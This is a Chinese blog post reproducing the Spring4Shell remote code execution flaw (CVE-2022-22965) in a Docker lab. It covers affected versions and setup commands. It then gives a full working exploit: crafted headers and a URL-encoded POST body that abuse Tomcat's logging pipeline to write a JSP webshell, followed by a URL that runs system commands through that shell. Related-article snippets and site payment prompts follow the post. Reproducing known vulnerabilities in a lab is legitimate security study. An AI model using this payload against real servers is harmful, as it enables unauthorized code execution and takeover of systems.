Spring4shell远程命令执行(CVE-2022-22965)

已于 2022-10-09 15:25:45 修改
阅读量2.1k 收藏 2
点赞数 1
分类专栏: 漏洞 文章标签: java spring 开发语言 web安全 框架
于 2022-10-09 15:16:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/127226921
版权
本文介绍了Spring4Shell漏洞原理及利用条件,适用于JDK9+、特定版本的SpringFramework及部署方式。文中详细展示了如何使用Docker搭建测试环境,并通过构造POST请求实现Webshell上传,最终完成命令执行。
摘要由CSDN通过智能技术生成

一 漏洞原理

Java Spring framework今年又爆出两个远程命令执行漏洞,一个影响的是Spring Cloud组件,另一个就是Spring4Shell(因Log4Shell而得名),该漏洞是基于CVE-2010-1622的补丁绕过,通过构造的POST请求,可以上传Webshell,进而命令执行。

二 利用条件以及影响范围

  • JDK 9+

  • Spring Framework 版本(<5.2 | 5.2.0-19 | 5.3.0-17)

  • Apache Tomcat的web应用服务器,部署方式为WAR包

  • 依赖Spring Framework的spring-webmvc或spring-webflux组件

  • Spring Framework 5.3.X < 5.3.18 
  • Spring Framework 5.2.X < 5.2.20

三 漏洞复现

        1.环境搭建

                这里使用docker搭建(也可以使用在线的vulfocus)

                以下是使用docker搭建的命令

docker pull vulfocus/spring-core-rce-2022-03-29      //下载漏洞镜像
docker run -d -p 8010:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29   //启动并映射端口,映射的端口可以自主调节

搭建好之后,出现以下图片说明搭建成功

         2.漏洞利用

                使用抓包工具进行抓包,更改为post传输方式,修改数据包,使用payload进行weshell写入

payload(可以自行修改):

第一行:要写入的内容

第二行:文件后缀

第三行:写入路径

第四行:写入文件名称

第五行空值即可

suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

使用重发模块进行测试,如下图

在浏览器访问即可(shell.jsp记得替换为自己传入的文件名称哦)

 http://xx.xx.xx.xx:端口/shell.jsp?pwd=j&cmd=whoami

 exp:GitHub - reznok/Spring4Shell-POC: Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit

 

Spring 框架RCE 安全漏洞及解决方式
oscar999的专栏
03-31 1万+
SpringShellSpring Core RCE 0-day Vulnerability”。 这个漏洞是一个RCE的漏洞,RCE (remote command/code execute),远端命令执行, 也就是可以在远端控制服务器,相当于一个命令窗口,类似于linux 的Shell , 所以被称为 SpringShell
Spring RCE远程执行漏洞(CVE-2022-22965
tpaer的博客
10-18 2643
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞。
Spring4ShellCVE-2022-22965
include_voidmain的博客
10-18 1069
Spring4ShellCVE-2022-22965
学习CVE-2022-22965
最新发布
2302_78853575的博客
09-17 842
漏洞复盘CVE-2022-22965
Spring4Shell POC
黑剑
03-31 406
Spring4shell
CVE-2022-22965Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965Spring Framework远程代码执行漏洞
[Java安全]—Spring4Shell
Sentiment的博客
10-09 1302
最近一直在学Java开发补基础,好久没看安全了,正好才学完Spring,所以接着了解了一下自动绑定问题 —— Spring4shell
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1779
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 3997
CVE-2022-22965 Spring远程代码执行漏洞复现
Spring Rce 漏洞分析CVE-2022-22965
god_Zeo的安全博客
04-07 1万+
0x01 漏洞介绍 Spring Framework 是一个开源的轻量级J2EE应用程序开发框架。 3月31日,VMware发布安全公告,修复了Spring Framework中的远程代码执行漏洞(CVE-2022-22965)。在 JDK 9 及以上版本环境下,可以利用此漏洞在未授权的情况下在目标系统上写入恶意程序从而远程执行任意代码。 0x02 影响范围 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEAS
记一次Spring4shell漏洞分析
向阳-Y.的博客
12-19 906
Spring4shell漏洞分析
Spring Framework 远程代码执行漏洞复现(CVE-2022-22965
Start C的博客
04-01 4844
1、概述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JD
spring shell Java命令行集成
汪小哥
11-30 1079
一、起源 1.1 原由 为什么要使用spring shell,在公司中,发现同事使用scala 写了一个交互的命令行程序,其实就是scala自带的信,注册了函数,感觉使用起来挺方便的,为啥Java里面没有这样的使用东西!挺好奇的,我想使用一个接入简单方便,不要花费太多的时间,且我们要熟悉!最后发现spring shell 比较好!集成了spring的容器机制!这个在今天的Java 后端程序员中...
Spring4Shell 漏洞已遭Mirai 僵尸网络利用
smellycat000的专栏
04-11 344
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Mirai 恶意软件正在利用 Spring4Shell exploit 感染易受攻击的 web 服务器并将其纳入DDoS(分布式拒绝服务)攻击。Spring4Shell 是一个严重的远程代码执行 (RCE) 漏洞 (CVE-2022-22965),影响广泛使用的企业级 Java app 开发平台 Spring Frame...
探秘Spring4Shell安全防护与实战应用
gitblog_00007的博客
04-02 343
探秘Spring4Shell安全防护与实战应用 去发现同类优质开源项目:https://gitcode.com/ 在Web开发的世界中,Spring框架以其强大而灵活的能力深受开发者喜爱。然而,安全性始终是任何软件开发中的核心议题。为此,我们今天要介绍一个特别的项目——,这是一个针对Spring框架安全研究和防御工具。 项目简介 Spring4Shell,顾名思义,是对Spring框架中可能出...
一个根据方法生成界面的java框架,gui版的“spring-shell
qq_34048218的博客
03-03 357
一个类似spring-shell框架,不同之处在于这个框架生成的shell带有gui界面。
采用 spring shell开发 java命令行工具
m0_67391401的博客
04-29 901
由于spring shell库的使用其官网以及IBM上都有很详细的介绍和使用示例,本篇主要是对资源的罗列汇总和给出一个完整的简单的示例。 1、spring shell 官网地址: http://projects.spring.io/spring-shell/ 2、spring shell官网使用文档地址(在此罗列的是版本2.0.0):https://docs.spring.io/spring-shell/docs/2.0.0.RELEASE/reference/htmlsingle/ 3、spring
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值